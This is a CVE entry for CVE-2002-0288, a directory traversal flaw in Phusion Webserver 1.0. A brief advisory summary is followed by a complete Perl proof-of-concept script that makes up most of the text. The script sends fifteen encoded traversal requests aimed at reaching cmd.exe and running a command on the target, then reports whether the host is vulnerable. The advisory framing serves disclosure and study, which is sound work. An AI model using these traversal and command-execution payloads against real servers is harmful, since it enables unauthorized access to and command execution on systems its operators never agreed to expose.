CVE-2002-0288

An attacker can send an HTTP request containing a directory traversal sequence, such as triple-dot-slash (`.../`) with HTTP-encoded variations of slashes, to the vulnerable web server. This allows the attacker to break out of the web root directory. The exploit attempts to access sensitive files like `winnt/system32/cmd.exe` [ref_id=1].

The vulnerability exists in Phusion Webserver version 1.0. The specific code paths responsible for handling HTTP requests and resolving file paths are not detailed in the provided information. However, the exploit script demonstrates various methods of crafting malicious requests to bypass directory restrictions [ref_id=1].

The advisory does not specify a patch or provide remediation guidance. Therefore, the exact fix is not detailed. Users are advised to consult vendor advisories for the latest information on patches or workarounds.

#!/usr/bin/perl # # Simple script to identify if the host is vulnerable!, # # This does 15 different checks based IIS 4-5. Have Fun! # # Phusion Webserver v1.0 proof-of-concept exploit # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion_exp.pl <Hosts>:<Port> # # Example: # # perl -x Phusion_exp.pl www.whitehouse.com:80 # Trying..................... # # <THIS HOST IS VULNERABLE> :-) # Check the previous notes to execute bugs. # #

use Socket;

if ($#ARGV<0) {die " Phusion Webserver v1.0 traversal exploit(c)2002. Alex Hernandez al3xhernandez\@ureach.com\n Usage: perl -x $0 www.whitehouse.com:80 {OR} [if the host is not using a proxy] Usage: perl -x $0 127.0.0.1:80\n\n";}

($host,$port)=split(/:/,@ARGV[0]); print "Trying.....................\n"; $target = inet_aton($host); $flag=0;

# ---------------test method 1 my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 2 my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 3 my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 4 my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 5 my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 6 my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 7 my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 8 my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 9 my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 10 my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 11 my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 12 my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 13 my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 14 my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../ winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

# ---------------test method 15 my @results=sendraw("GET /.../.../.../.../winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}}

#------------------------------ if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n Check the previous notes to execute bugs\n";} else {print "<THIS HOST IS NOT VULNERABLE> :-( \n Check manually on browser...\n";}

sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect check the port or address...\n"); } } [ref_id=1]